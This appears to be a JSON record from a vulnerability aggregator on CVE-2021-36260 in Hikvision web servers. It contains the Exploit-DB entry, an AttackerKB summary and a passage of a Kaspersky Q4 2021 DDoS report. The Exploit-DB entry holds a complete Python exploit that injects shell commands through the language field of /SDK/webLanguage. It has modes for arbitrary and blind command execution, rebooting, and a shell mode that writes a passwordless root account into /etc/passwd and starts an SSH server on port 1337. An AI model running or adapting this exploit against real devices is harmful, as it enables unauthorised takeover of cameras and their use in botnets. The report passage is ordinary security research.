"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260", "2021-36260"], "modified": "2021-10-25T00:00:00", "id": "EDB-ID:50441", "href": "https://www.exploit-db.com/exploits/50441", "sourceData": "# Exploit Title: Hikvision Web Server Build 210702 - Command Injection\r\n# Exploit Author: bashis\r\n# Vendor Homepage: https://www.hikvision.com/\r\n# Version: 1.0\r\n# CVE: CVE-2021-36260\r\n# Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html\r\n\r\n# All credit to Watchful_IP\r\n\r\n#!/usr/bin/env python3\r\n\r\n\"\"\"\r\nNote:\r\n1) This code will _not_ verify if remote is Hikvision device or not.\r\n2) Most of my interest in this code has been concentrated on how to\r\n reliably detect vulnerable and/or exploitable devices.\r\n Some devices are easy to detect, verify and exploit the vulnerability,\r\n other devices may be vulnerable but not so easy to verify and exploit.\r\n I think the combined verification code should have very high accuracy.\r\n3) 'safe check' (--check) will try write and read for verification\r\n 'unsafe check' (--reboot) will try reboot the device for verification\r\n\r\n[Examples]\r\nSafe vulnerability/verify check:\r\n $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check\r\n\r\nSafe and unsafe vulnerability/verify check:\r\n(will only use 'unsafe check' if not verified with 'safe check')\r\n $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot\r\n\r\nUnsafe vulnerability/verify check:\r\n $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot\r\n\r\nLaunch and connect to SSH shell:\r\n $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell\r\n\r\nExecute command:\r\n $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd \"ls -l\"\r\n\r\nExecute blind command:\r\n $./CVE-2021-36260.py --rhost 
192.168.57.20 --rport 8080 --cmd_blind \"reboot\"\r\n\r\n$./CVE-2021-36260.py -h\r\n[*] Hikvision CVE-2021-36260\r\n[*] PoC by bashis <mcw noemail eu> (2021)\r\nusage: CVE-2021-36260.py [-h] --rhost RHOST [--rport RPORT] [--check]\r\n [--reboot] [--shell] [--cmd CMD]\r\n [--cmd_blind CMD_BLIND] [--noverify]\r\n [--proto {http,https}]\r\n\r\noptional arguments:\r\n -h, --help show this help message and exit\r\n --rhost RHOST Remote Target Address (IP/FQDN)\r\n --rport RPORT Remote Target Port\r\n --check Check if vulnerable\r\n --reboot Reboot if vulnerable\r\n --shell Launch SSH shell\r\n --cmd CMD execute cmd (i.e: \"ls -l\")\r\n --cmd_blind CMD_BLIND\r\n execute blind cmd (i.e: \"reboot\")\r\n --noverify Do not verify if vulnerable\r\n --proto {http,https} Protocol used\r\n$\r\n\"\"\"\r\n\r\nimport os\r\nimport argparse\r\nimport time\r\n\r\nimport requests\r\nfrom requests import packages\r\nfrom requests.packages import urllib3\r\nfrom requests.packages.urllib3 import exceptions\r\n\r\n\r\nclass Http(object):\r\n def __init__(self, rhost, rport, proto, timeout=60):\r\n super(Http, self).__init__()\r\n\r\n self.rhost = rhost\r\n self.rport = rport\r\n self.proto = proto\r\n self.timeout = timeout\r\n\r\n self.remote = None\r\n self.uri = None\r\n\r\n \"\"\" Most devices will use self-signed certificates, suppress any warnings \"\"\"\r\n requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)\r\n\r\n self.remote = requests.Session()\r\n\r\n self._init_uri()\r\n\r\n self.remote.headers.update({\r\n 'Host': f'{self.rhost}:{self.rport}',\r\n 'Accept': '*/*',\r\n 'X-Requested-With': 'XMLHttpRequest',\r\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\r\n 'Accept-Encoding': 'gzip, deflate',\r\n 'Accept-Language': 'en-US,en;q=0.9,sv;q=0.8',\r\n })\r\n \"\"\"\r\n self.remote.proxies.update({\r\n # 'http': 'http://127.0.0.1:8080',\r\n })\r\n \"\"\"\r\n\r\n def send(self, url=None, query_args=None, 
timeout=5):\r\n\r\n if query_args:\r\n \"\"\"Some devices can handle more, others less, 22 bytes seems like a good compromise\"\"\"\r\n if len(query_args) > 22:\r\n print(f'[!] Error: Command \"{query_args}\" to long ({len(query_args)})')\r\n return None\r\n\r\n \"\"\"This weird code will try automatically switch between http/https\r\n and update Host\r\n \"\"\"\r\n try:\r\n if url and not query_args:\r\n return self.get(url, timeout)\r\n else:\r\n data = self.put('/SDK/webLanguage', query_args, timeout)\r\n except requests.exceptions.ConnectionError:\r\n self.proto = 'https' if self.proto == 'http' else 'https'\r\n self._init_uri()\r\n try:\r\n if url and not query_args:\r\n return self.get(url, timeout)\r\n else:\r\n data = self.put('/SDK/webLanguage', query_args, timeout)\r\n except requests.exceptions.ConnectionError:\r\n return None\r\n except requests.exceptions.RequestException:\r\n return None\r\n except KeyboardInterrupt:\r\n return None\r\n\r\n \"\"\"302 when requesting http on https enabled device\"\"\"\r\n\r\n if data.status_code == 302:\r\n redirect = data.headers.get('Location')\r\n self.uri = redirect[:redirect.rfind('/')]\r\n self._update_host()\r\n if url and not query_args:\r\n return self.get(url, timeout)\r\n else:\r\n data = self.put('/SDK/webLanguage', query_args, timeout)\r\n\r\n return data\r\n\r\n def _update_host(self):\r\n if not self.remote.headers.get('Host') == self.uri[self.uri.rfind('://') + 3:]:\r\n self.remote.headers.update({\r\n 'Host': self.uri[self.uri.rfind('://') + 3:],\r\n })\r\n\r\n def _init_uri(self):\r\n self.uri = '{proto}://{rhost}:{rport}'.format(proto=self.proto, rhost=self.rhost, rport=str(self.rport))\r\n\r\n def put(self, url, query_args, timeout):\r\n \"\"\"Command injection in the <language> tag\"\"\"\r\n query_args = '<?xml version=\"1.0\" encoding=\"UTF-8\"?>' \\\r\n f'<language>$({query_args})</language>'\r\n return self.remote.put(self.uri + url, data=query_args, verify=False, allow_redirects=False, 
timeout=timeout)\r\n\r\n def get(self, url, timeout):\r\n return self.remote.get(self.uri + url, verify=False, allow_redirects=False, timeout=timeout)\r\n\r\n\r\ndef check(remote, args):\r\n \"\"\"\r\n status_code == 200 (OK);\r\n Verified vulnerable and exploitable\r\n status_code == 500 (Internal Server Error);\r\n Device may be vulnerable, but most likely not\r\n The SDK webLanguage tag is there, but generate status_code 500 when language not found\r\n I.e. Exist: <language>en</language> (200), not exist: <language>EN</language> (500)\r\n (Issue: Could also be other directory than 'webLib', r/o FS etc...)\r\n status_code == 401 (Unauthorized);\r\n Defiantly not vulnerable\r\n \"\"\"\r\n if args.noverify:\r\n print(f'[*] Not verifying remote \"{args.rhost}:{args.rport}\"')\r\n return True\r\n\r\n print(f'[*] Checking remote \"{args.rhost}:{args.rport}\"')\r\n\r\n data = remote.send(url='/', query_args=None)\r\n if data is None:\r\n print(f'[-] Cannot establish connection to \"{args.rhost}:{args.rport}\"')\r\n return None\r\n print('[i] ETag:', data.headers.get('ETag'))\r\n\r\n data = remote.send(query_args='>webLib/c')\r\n if data is None or data.status_code == 404:\r\n print(f'[-] \"{args.rhost}:{args.rport}\" do not looks like Hikvision')\r\n return False\r\n status_code = data.status_code\r\n\r\n data = remote.send(url='/c', query_args=None)\r\n if not data.status_code == 200:\r\n \"\"\"We could not verify command injection\"\"\"\r\n if status_code == 500:\r\n print(f'[-] Could not verify if vulnerable (Code: {status_code})')\r\n if args.reboot:\r\n return check_reboot(remote, args)\r\n else:\r\n print(f'[+] Remote is not vulnerable (Code: {status_code})')\r\n return False\r\n\r\n print('[!] 
Remote is verified exploitable')\r\n return True\r\n\r\n\r\ndef check_reboot(remote, args):\r\n \"\"\"\r\n We sending 'reboot', wait 2 sec, then checking with GET request.\r\n - if there is data returned, we can assume remote is not vulnerable.\r\n - If there is no connection or data returned, we can assume remote is vulnerable.\r\n \"\"\"\r\n if args.check:\r\n print('[i] Checking if vulnerable with \"reboot\"')\r\n else:\r\n print(f'[*] Checking remote \"{args.rhost}:{args.rport}\" with \"reboot\"')\r\n remote.send(query_args='reboot')\r\n time.sleep(2)\r\n if not remote.send(url='/', query_args=None):\r\n print('[!] Remote is vulnerable')\r\n return True\r\n else:\r\n print('[+] Remote is not vulnerable')\r\n return False\r\n\r\n\r\ndef cmd(remote, args):\r\n if not check(remote, args):\r\n return False\r\n data = remote.send(query_args=f'{args.cmd}>webLib/x')\r\n if data is None:\r\n return False\r\n\r\n data = remote.send(url='/x', query_args=None)\r\n if data is None or not data.status_code == 200:\r\n print(f'[!] 
Error execute cmd \"{args.cmd}\"')\r\n return False\r\n print(data.text)\r\n return True\r\n\r\n\r\ndef cmd_blind(remote, args):\r\n \"\"\"\r\n Blind command injection\r\n \"\"\"\r\n if not check(remote, args):\r\n return False\r\n data = remote.send(query_args=f'{args.cmd_blind}')\r\n if data is None or not data.status_code == 500:\r\n print(f'[-] Error execute cmd \"{args.cmd_blind}\"')\r\n return False\r\n print(f'[i] Try execute blind cmd \"{args.cmd_blind}\"')\r\n return True\r\n\r\n\r\ndef shell(remote, args):\r\n if not check(remote, args):\r\n return False\r\n data = remote.send(url='/N', query_args=None)\r\n\r\n if data.status_code == 404:\r\n print(f'[i] Remote \"{args.rhost}\" not pwned, pwning now!')\r\n data = remote.send(query_args='echo -n P::0:0:W>N')\r\n if data.status_code == 401:\r\n print(data.headers)\r\n print(data.text)\r\n return False\r\n remote.send(query_args='echo :/:/bin/sh>>N')\r\n remote.send(query_args='cat N>>/etc/passwd')\r\n remote.send(query_args='dropbear -R -B -p 1337')\r\n remote.send(query_args='cat N>webLib/N')\r\n else:\r\n print(f'[i] Remote \"{args.rhost}\" already pwned')\r\n\r\n print(f'[*] Trying SSH to {args.rhost} on port 1337')\r\n os.system(f'stty echo; stty iexten; stty icanon; \\\r\n ssh -o StrictHostKeyChecking=no -o LogLevel=error -o UserKnownHostsFile=/dev/null \\\r\n P@{args.rhost} -p 1337')\r\n\r\n\r\ndef main():\r\n print('[*] Hikvision CVE-2021-36260\\n[*] PoC by bashis <mcw noemail eu> (2021)')\r\n\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--rhost', required=True, type=str, default=None, help='Remote Target Address (IP/FQDN)')\r\n parser.add_argument('--rport', required=False, type=int, default=80, help='Remote Target Port')\r\n parser.add_argument('--check', required=False, default=False, action='store_true', help='Check if vulnerable')\r\n parser.add_argument('--reboot', required=False, default=False, action='store_true', help='Reboot if vulnerable')\r\n 
parser.add_argument('--shell', required=False, default=False, action='store_true', help='Launch SSH shell')\r\n parser.add_argument('--cmd', required=False, type=str, default=None, help='execute cmd (i.e: \"ls -l\")')\r\n parser.add_argument('--cmd_blind', required=False, type=str, default=None, help='execute blind cmd (i.e: \"reboot\")')\r\n parser.add_argument(\r\n '--noverify', required=False, default=False, action='store_true', help='Do not verify if vulnerable'\r\n )\r\n parser.add_argument(\r\n '--proto', required=False, type=str, choices=['http', 'https'], default='http', help='Protocol used'\r\n )\r\n args = parser.parse_args()\r\n\r\n remote = Http(args.rhost, args.rport, args.proto)\r\n\r\n try:\r\n if args.shell:\r\n shell(remote, args)\r\n elif args.cmd:\r\n cmd(remote, args)\r\n elif args.cmd_blind:\r\n cmd_blind(remote, args)\r\n elif args.check:\r\n check(remote, args)\r\n elif args.reboot:\r\n check_reboot(remote, args)\r\n else:\r\n parser.parse_args(['-h'])\r\n except KeyboardInterrupt:\r\n return False\r\n\r\n\r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://www.exploit-db.com/download/50441", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-05-02T08:37:34", "description": "A command injection vulnerability in the web server of some Hikvision product. 
Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-22T00:00:00", "type": "attackerkb", "title": "CVE-2021-36260", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260", "CVE-2021-36320"], "modified": "2022-02-20T00:00:00", "id": "AKB:1D0445C7-C9A7-44D8-BC02-6610FBEF828F", "href": "https://attackerkb.com/topics/mb8q72U2LT/cve-2021-36260", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2022-03-17T11:28:01", "description": "\n\n## News roundup\n\nQ4 2021 saw the appearance of several new DDoS botnets. 
A zombie network, [named Abcbot](<https://securityaffairs.co/wordpress/124542/security/abcbot-ddos-botnet-linux.html>) by researchers, first hit the radar in July, but at the time it was little more than a simple scanner attacking Linux systems by brute-forcing weak passwords and exploiting known vulnerabilities. In October, the botnet was upgraded with DDoS functionality. Then in December, researchers at Cado Security linked the botnet to the Xanthe [cryptojacking](<https://encyclopedia.kaspersky.com/glossary/cryptojacking/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) group. This is further evidence that the same botnets are often used for mining and DDoS.\n\nThe EwDoor botnet, which first came to researchers' attention in late October, [turned out to be more picky](<https://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/>) than Abcbot. This zombie network consists solely of EdgeMarc Enterprise Session Border Controller devices located on AT&T carrier networks. The bot infiltrated the devices through the [CVE-2017-6079](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6079>) vulnerability, which allows execution of arbitrary commands. By exploiting a bug in the bot itself (one of the first versions accessed a non-existent C2 server registered by researchers), Netlab 360 managed to detect 5,700 infected devices. However, the cybercriminals later severed communication with this server. AT&T is [investigating](<https://therecord.media/att-takes-action-against-ddos-botnet-that-hijacked-voip-servers/>) attacks on EdgeMarc devices.\n\nIn November, Qrator Labs [recorded](<https://habr.com/ru/company/qrator/blog/593741/>) a series of short but powerful attacks on its systems and those of its clients. The attackers used a TCP data flood: they established a TCP connection to the victim's server, then flooded it with random heavy TCP packets. In some cases, DNS amplification was also used. 
The attacks, launched from thousands of cameras and routers, lasted 2\u20133 minutes and then stopped. Researchers note that the botnet is new, and they currently lack sufficient data to describe it. They also speculate that the short attack duration is because the attackers wish to remain undetected, so they do not borrow infected device users' communication channels for long.\n\nGoogle's Damian Menscher discovered a zombie network consisting of [vulnerable GitLab servers](<https://www.techtarget.com/searchsecurity/news/252509093/DDoS-botnet-exploiting-known-GitLab-vulnerability>). The botnet hijacked new devices by exploiting the [CVE-2021-22205](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22205>) vulnerability, which GitLab patched in April 2021, and carried out DDoS attacks of over 1TB/s. Menscher does not specify whether the bot is entirely new or related to existing botnets. However, around the same time, Cloudflare [reported](<https://blog.cloudflare.com/cloudflare-blocks-an-almost-2-tbps-multi-vector-ddos-attack/>) a brief but powerful Mirai-type attack, involving, among other things, GitLab servers infected through CVE-2021-22205.\n\nKnown botnets made the news more than once in Q4. For instance, Moobot added a [relatively fresh vulnerability](<https://threatpost.com/moobot-botnet-hikvision-surveillance-systems/176879/>) to its arsenal. A bug designated as [CVE-2021-36260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36260>) was found in some Hikvision camera models and patched in September 2021. Like CVE-2017-6079, this vulnerability allows attackers to execute arbitrary commands. Once on the device, Moobot waits for a command from the C2 server before launching a DDoS attack. Researchers link the campaign to a DDoS-as-a-Service provider whose Telegram channel they came across during their analysis. 
The channel was created in June and went live in August 2021.\n\nThe M\u0113ris botnet discovered [last quarter](<https://securelist.com/ddos-attacks-in-q3-2021/104796/>) turned out to be two botnets, reports Netscout. The company named the second one [Dvinis](<https://www.netscout.com/blog/asert/tale-two-botnets>) ("twin" in Latvian). Unlike its elder brother, it does not use HTTP pipelining, but is also deployed in high-power attacks. Moreover, according to Netscout, Dvinis accounts for 75% of all attacks attributed to M\u0113ris.\n\nIn late 2021, news broke of a [vulnerability in the Apache Log4j library](<https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/>), which laid claim to being the most dangerous vulnerability of the year. Log4Shell, as the vulnerability is called, is present in all versions of Log4j from 2.0-beta9 to 2.14.1, and allows an attacker to take full control over a vulnerable system. What's more, an exploit for the vulnerability is available online, and the library that contains it is used in millions of products, both commercial and open-source. Not surprisingly, [many cybercriminals](<https://www.securityweek.com/ransomware-trojans-ddos-malware-and-crypto-miners-delivered-log4shell-attacks>), including DDoS botnet developers, have added Log4Shell to their toolkit. In particular, [Mirai](<https://fidelissecurity.com/threatgeek/archive/observations-from-a-log4j-decoy-from-vulnerability-to-infection-to-ddos-in-record-time/>), [Muhstik](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) and Elknot bots are trying to exploit this vulnerability.\n\nAs for DDoS attacks themselves, media in the Philippines came under repeated fire during the past quarter. 
In mid-November, the online outfit [PinoyMedia Center](<https://newsinfo.inquirer.net/1518615/alternative-media-site-shuts-down-after-cyberattack>) was flooded; then in the first half of December the same fate befell the [news portal ABC-CBN News](<https://www.rappler.com/technology/abs-cbn-news-website-latest-victim-cyberattack/>), followed by the [media organization VERA Files](<https://verafiles.org/articles/vera-files-overcomes-cyberattack>); the digital media company Rappler was also [attacked several times](<https://www.rappler.com/technology/rappler-website-weathers-another-ddos-attack/>) a month by unknown actors. Also in Q4, the [Indonesian journalism initiative Project Multatuli](<https://www.thejakartapost.com/life/2021/10/07/project-multatuli-digitally-attacked-after-reporting-on-police-inaction-in-rape-case.html>) got DDoSed after publishing an article criticizing the work of local law enforcement agencies.\n\nCybercriminals also targeted tech companies this quarter. The Polish arm of T-Mobile reported the [largest ever attack on this sector in the country](<https://www.reuters.com/business/media-telecom/polish-t-mobile-unit-faces-cyber-attack-systems-not-compromised-2021-12-03/>), which, however, was repelled. Another DDoS target was the blockchain platform [Solana](<https://cointelegraph.com/news/solana-reportedly-hit-by-ddos-attack-but-network-remains-online>). Blockasset, an NFT marketplace powered by Solana, was the first to draw attention to the attack. The company noted that the DDoS had caused a slowdown in token distribution. GenesysGo, a Solana-based infrastructure provider, also noted some services were working intermittently, but assured there was no major cause for concern.\n\nThe DDoS attacks on VoIP providers continued. 
In early October, [British company VoIP Unlimited](<https://www.ispreview.co.uk/index.php/2021/10/ddos-attack-hits-voip-and-internet-provider-voip-unlimited-again.html>) fell victim again, having been attacked by DDoS extortionists last quarter. The new wave of junk traffic was accompanied by a ransom demand. Similar attacks affected [various other British providers](<https://www.bbc.com/news/technology-59053876>). And in November, clients of VoIP provider [Telnyx](<https://www.bleepingcomputer.com/news/security/telnyx-is-the-latest-voip-provider-hit-with-ddos-attacks/>) worldwide were hit by outages. The perpetrators may have been the REvil group, which is linked to past attacks on VoIP providers and was [liquidated](<https://www.bbc.com/news/technology-59998925>) by Russian law enforcement agencies in January, after the US authorities had supplied information about the attackers.\n\nIn Q4, besides VoIP providers, [e-mail service providers](<https://therecord.media/ddos-attacks-hit-multiple-email-providers/>) were targeted by ransom DDoS (RDoS) campaigns. Those affected were mostly small companies that provide secure and private e-mail accounts by subscription or invitation: Runbox, Posteo, Fastmail, TheXYZ, Guerrilla Mail, Mailfence, Kolab Now and RiseUp. The attackers called themselves Cursed Patriarch and demanded a ransom of 0.06 BTC from victims (around US$4,000 at the time of the attack).\n\nRansomware operators continued to use DDoS as additional leverage. For instance, right from the start the new Yanluowang ransomware [threatens to DDoS victims](<https://www.bleepingcomputer.com/news/security/new-yanluowang-ransomware-used-in-targeted-enterprise-attacks/>) if "they take the attackers for fools." 
Besides Yanluowang, the [HelloKitty ransomware](<https://securityintelligence.com/news/hellokitty-ransomware-group-ddos-extortion/>) group, known for [attacking](<https://www.kaspersky.com/blog/cd-projekt-ransomware-attack/38701/>) CD Projekt, the developer of _The Witcher_ and _Cyberpunk 2077_, added DDoS to its arsenal.\n\nSpeaking of games: attackers in Q4 did not leave gamers alone. In October, _Apex Legends_ players [set a record](<https://www.invenglobal.com/articles/15279/apex-players-win-longest-match-in-history-due-to-ddos-attack>) for the longest match ever, because the server was DDoSed throughout. And attacks on Blizzard in [November](<https://www.techtimes.com/articles/268483/20211124/activision-blizzard-s-battle-net-down-battle-net-ddos-attack-call-of-duty-warzone-minor-outage-overwatch-minor-outage.htm>) and [December](<https://www.digitaltrends.com/gaming/blizzard-hit-with-another-ddos/>) led to problems with accessing certain games, in particular _Overwatch_ and _World of Warcraft_. Players themselves also got it in the neck. Among those who [suffered](<https://dotesports.com/streaming/news/twitch-streamers-sodapoppin-xqc-nick-polom-get-ddosd-after-ip-leak>) were several popular streamers, likely due to an IP leak from the new title _Crab Game_: the streamers experienced issues after playing the game. Meanwhile, some _Dead by Daylight_ streamers were not only DDoSed, but [doxxed](<https://encyclopedia.kaspersky.com/glossary/doxxing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) and swatted (the act of making a false report to the police with the intention of having a real-life SWAT team sent to the target's home). One of the victims tweeted that, during such a fake call, one of the police officers recognized him because he himself plays _Dead by Daylight_. 
How exactly the attackers got hold of the streamers' IP addresses and other data is unknown.\n\nhttps://twitter.com/Elix_9/status/1458330303437574149\n\nFans of _Titanfall 2_, fed up with DDoS attacks, took the initiative in Q4 and [created a mod](<https://www.pcgamer.com/titanfall-2-gets-fan-made-custom-servers-on-pc/>) for playing on custom servers if the official ones are down. Tracking the IP of a private server to flood it with junk traffic is not child's play, so this measure greatly reduces the likelihood of DDoS.\n\nSuccesses in the fight against botnets were reflected in Q4 news. In October, for instance, Ukrainian police [arrested](<https://therecord.media/ukraine-arrests-operator-of-ddos-botnet-with-100000-bots/>) the operator of a DDoS botnet consisting of 100,000 infected devices. And in December, Google [filed a lawsuit](<https://threatpost.com/google-glupteba-botnet-lawsuit/176826/>) against the operators of another botnet, Glupteba. The Internet giant also took steps to eliminate the botnet itself by blocking 63 million malicious documents, 908 cloud projects, more than a thousand Google accounts and a further 870 Google Ads accounts. Google also worked with other companies to shut down the botnet's C2 servers. Glupteba consists of a million infected IoT devices and Windows computers. The botnet can also install proxy servers on infected devices, mine cryptocurrency and conduct DDoS attacks. In addition, Glupteba uses the Bitcoin blockchain to store the addresses of backup C2 servers, making it harder to defeat. According to Kaspersky, it was this botnet that facilitated the spread of the notorious M\u0113ris last quarter.\n\nOne last thing, attackers regularly carry out DDoS attacks on each other. 
In November, unknown actors [tried to take down](<https://www.bleepingcomputer.com/news/security/dark-web-market-cannazon-shuts-down-after-massive-ddos-attack/>) the dark-web marketplace Cannazon, which, as the name suggests, specializes in the sale of cannabis. The resource was shut down shortly afterwards, but its administrators [claim](<https://www.techradar.com/news/dark-web-marketplace-bites-the-dust-after-colossal-ddos-attack>) they had long planned to close it anyway, and the DDoS was a convenient pretext to act sooner rather than later.\n\n## Quarter and year trends\n\nQ4 played out in line with our forecasts: we saw impressive growth in the number of DDoS attacks, setting a new record in the history of our observations. Let's look at the figures:\n\n_Comparative number of DDoS attacks, Q3 and Q4 2021, and Q4 2020. Q4 2020 data is taken as 100% ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154544/01-en-ddos-report-q4.png>))_\n\nThe number of attacks in Q4 increased by 52% against the previous quarter and more than 4.5 times against the same period last year. The numbers look scary, but instead of rushing to conclusions, better to figure out why they are so.\n\nLet's start with the increase in the number of DDoS attacks relative to Q3. Such growth in the last three months of the year is a traditional seasonal fluctuation that we predict (and that occurs) pretty much every year. Towards the end of the year, life steps up a gear, and this cannot fail to affect the DDoS market: competition in retail hots up, students sit exams, various activists become more lively: all this leads to an increase in the number of attacks.\n\nIn addition, the size of the DDoS market is inversely proportional to that of the cryptocurrency market, which we've written about several times. 
This is because DDoS and mining capacities are partially interchangeable, so botnet owners tend to deploy them in mining when cryptocurrency prices are high and in DDoS when they fall. We witnessed precisely that in Q4, and not for the first time: a rise in the number of DDoS attacks amid a sharp drop in the value of cryptocurrencies.\n\nBoth of these factors \u2014 seasonal fluctuations and falling cryptocurrency prices \u2014 buoyed the DDoS attack market throughout Q4, hence the 1.5-fold increase. This becomes even clearer when viewing the stats by month: October accounted for 16% of all DDoS attacks in Q4, November 46% and December 38%.\n\n_Percentage distribution of DDoS attacks by month, Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154631/02-en-ddos-report-q4.png>))_\n\nNow let's see where the frightening 4.5-fold increase relative to the previous year came from. In contrast to 2021's all-time high Q4, 2020 posted a record low. In Q4 2020, we observed the opposite situation: a declining DDoS market against the backdrop of rampant cryptocurrency prices. In fact, the DDoS market spent just about the whole of 2021 recovering from this collapse, hence such impressive growth: in essence, 2021's all-time high divided by 2020's all-time low.\n\nThe diagram below clearly shows the increase in the number of DDoS attacks over the year, as well as peaks attributable to the cryptocurrency collapse in the summer of 2021 and at the end of the year.\n\n_Dynamics of DDoS attacks, October 2020\u2013December 2021; October 2020 data is taken as 100% ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154708/12-en-ddos-report-q4.png>))_\n\nAs for DDoS targets, the cross-industry distribution of attacks was fairly even \u2014 we cannot say that DDoS activity was higher in any particular sector. 
Perhaps the only thing of note was the spike in attacks on educational resources in November (largely in the Moscow region) and December (largely in the Republic of Tatarstan). We cannot pinpoint the reason for this, but most likely the attacks were related to regional specifics in the field of education, for example, the exam or vacation schedule.\n\n## DDoS attack statistics\n\n### Methodology\n\nKaspersky has a long history of combating cyberthreats, including DDoS attacks of any type and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.\n\nA part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes commands received by bots from C2 servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.\n\nThis report contains DDoS Intelligence statistics for Q4 2021.\n\nIn the context of this report, the incident is counted as a single DDoS attack only if the interval between botnet activity periods does not exceed 24 hours. If the same resource is attacked by the same botnet after an interval of 24 hours or more, two attacks will be counted. Bot requests originating from different botnets but directed at one resource also count as separate attacks.\n\nThe geographic locations of DDoS attack victims and C2 servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.\n\nDDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky. 
Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.\n\n### Quarter summary\n\n * Most of all, attackers in Q4 took aim at US-based resources: the country accounts for 43.55% of attacks and 44.54% of unique targets.\n * Our DDoS Intelligence system recorded 86,710 DDoS attacks.\n * The quarter's quietest days fell on Chinese Singles' Day and Black Friday, two mega shopping events.\n * 94.29% of attacks lasted less than 4 hours.\n * Half of the DDoS attacks were carried out by means of UDP flooding.\n * 46.49% of the botnet C2 servers were located in the US.\n * 70.96% of attacks on Kaspersky SSH honeypots were carried out by bots in Russia.\n\n### DDoS attacks geography\n\nIn Q4, as in previous quarters in 2021, the bulk of DDoS attacks targeted US-based resources (43.55%), and the country's share in the geographic distribution rose once more. China (9.96%) returned to second place, up 2.22 p.p. on the previous reporting period, while the Hong Kong SAR (8.80%) took bronze: its share fell by a factor of more than 1.5 against the previous quarter.\n\n_Distribution of DDoS attacks by country and territory, Q3 and Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154746/03-en-ddos-report-q4.png>))_\n\nThe share of attacks increased in Germany (4.85%) and France (3.75%), which moved up to fourth and fifth positions, respectively. Canada (3.64%) remained in sixth place, the UK (3.21%) climbed to seventh, while eighth spot in Q4 went to the Netherlands (2.75%), where things had been relatively calm in the previous reporting period. Rounding out the TOP 10 countries and territories by number of attacks at the end of 2021 are Singapore (2.68%) and Brazil (2.08%), whose share more than halved from the previous quarter.\n\nAs usual, the geography of unique targets mirrored the distribution of individual attacks. 
